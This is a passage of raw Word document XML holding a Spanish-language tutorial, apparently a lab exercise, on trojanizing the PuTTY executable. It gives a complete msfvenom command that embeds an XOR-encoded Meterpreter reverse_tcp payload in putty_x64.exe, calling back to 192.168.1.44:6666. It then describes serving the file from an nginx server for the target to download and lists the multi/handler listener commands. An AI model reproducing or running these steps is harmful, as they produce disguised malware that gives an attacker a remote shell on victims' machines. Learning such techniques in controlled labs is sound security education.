          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22B1B6AC" wp14:editId="16B9AE71">
            <wp:extent cx="5400040" cy="3843655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1327679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9188" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3843655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E792ED" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFC513C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El paiload elegimos el 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC53B0C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02770372" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C65E33D" wp14:editId="1BCB9239">
            <wp:extent cx="5400040" cy="3843655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1704873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3595" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3843655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBD5DA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D7D0D4" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y configuraremos los parámetros para la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73548B" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757F382D" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB5604F" wp14:editId="283C9B1B">
            <wp:extent cx="5400040" cy="3843655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1370305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5880" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3843655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B14D4" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547AD3DE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En lhost 192.168.1.44, en lport 6666:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071ED719" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452E9FB1" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38171D92" wp14:editId="69D63DCF">
            <wp:extent cx="5400040" cy="3843655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1017271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1010" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3843655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B11953" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D255EB1" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y con esto tenemos nuestro archivo modificado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE8877" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB600BD" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0E0AE2" wp14:editId="44C47464">
            <wp:extent cx="5400040" cy="1904365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1344047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913" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1904365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="104745C1" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora enseñaré la creación del payload desde metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BB097" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C26288" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora configuraré metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474AAE6F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1712A68D" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418C3AFA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBF54CC" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3624F6FE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Usaré este paiload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA3669" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF60DC5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FB1F692" wp14:editId="294D1B81">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3150870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7CA621D6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRPr="002C7216" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r w:rsidRPr="008D39AB">
                              <w:t xml:space="preserve">sudo msfvenom -a x64 --platform windows -p </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006426A7">
                              <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="008D39AB">
                              <w:t>-f exe-only -k - x /root/payloads/putty_x64.exe -o ./msfv_reverse_putty_x64.exe -e x64/xor -i 20 LHOST=192.168.</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">1.44 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="008D39AB">
                              <w:t>LPORT=</w:t>
                            </w:r>
                            <w:r>
                              <w:t>666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B1F692" id="_x0000_s1055" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517381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&#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LhntE2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7CA621D6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRPr="002C7216" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r w:rsidRPr="008D39AB">
                        <w:t xml:space="preserve">sudo msfvenom -a x64 --platform windows -p </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006426A7">
                        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="008D39AB">
                        <w:t>-f exe-only -k - x /root/payloads/putty_x64.exe -o ./msfv_reverse_putty_x64.exe -e x64/xor -i 20 LHOST=192.168.</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">1.44 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="008D39AB">
                        <w:t>LPORT=</w:t>
                      </w:r>
                      <w:r>
                        <w:t>6666</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B1E2C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7741757E" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25455830" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7054F530" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F24C8" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2542C754" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE59D9D" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDC3713" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67399FBA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="28B19BE2" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="40B5E380" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="1CE57A65" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="2A9546D0" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="3BCA7666" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="612D02EA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E24DCE3" wp14:editId="373AACB5">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40775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58506" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218"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11B7CBA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368C9D8C" w14:textId="2861E16F" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora subiremos este archivo a nuestro servidor de nginx, para </w:t>
      </w:r>
      <w:r w:rsidR="00A10482">
        <w:t>así</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poder descargarlo en la máquina que vamos atacar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B84E39E" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441D037C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61007717" wp14:editId="69E5974D">
            <wp:extent cx="3657143" cy="2133333"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="141837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4612" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657143" cy="2133333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B72C8" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400F281D" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>La IP de esta máquina es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082C8FD" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54654D54" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27EA5F08" wp14:editId="654C8B9F">
            <wp:extent cx="5400040" cy="3317875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2012713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3920" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D546AED" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A65F6A3" w14:textId="12E1DBC6" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora configuraremos metasploit para realizar la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B399BE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191DCF4A" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44954B2C" wp14:editId="2E71ACDB">
            <wp:extent cx="5400040" cy="2172335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="469828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8419" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221" cstate="screen">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14:paraId="27A60561" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27291642" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A01072D" wp14:editId="747D3D55">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="344620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0C6CF732" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r w:rsidRPr="003A7DB3">
                              <w:t>use multi/handler</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> -&gt; Para usar el hanler</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B53F4BB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r w:rsidRPr="003A7DB3">
                              <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> -&gt; Elijo la Shell que voy usar</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EE09348" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r w:rsidRPr="003A7DB3">
                              <w:t>set lhost 192.168.1.</w:t>
                            </w:r>
                            <w:r>
                              <w:t>44 -&gt; La IP que va escuchar</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="387F19D5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r w:rsidRPr="003A7DB3">
                              <w:t>set lport 6666</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> -&gt; El puerto a la escucha</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7F0ED0C6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r>
                              <w:t>run -&gt; Para ejecutar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1072D" id="_x0000_s1056" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517391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0C6CF732" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r w:rsidRPr="003A7DB3">
                        <w:t>use multi/handler</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> -&gt; Para usar el hanler</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B53F4BB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r w:rsidRPr="003A7DB3">
                        <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> -&gt; Elijo la Shell que voy usar</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EE09348" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r w:rsidRPr="003A7DB3">
                        <w:t>set lhost 192.168.1.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>44 -&gt; La IP que va escuchar</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="387F19D5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r w:rsidRPr="003A7DB3">
                        <w:t>set lport 6666</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> -&gt; El puerto a la escucha</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7F0ED0C6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r>
                        <w:t>run -&gt; Para ejecutarlo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E47A868" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E149418" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="06822F5E" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="4B5FEA09" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="39A240A6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
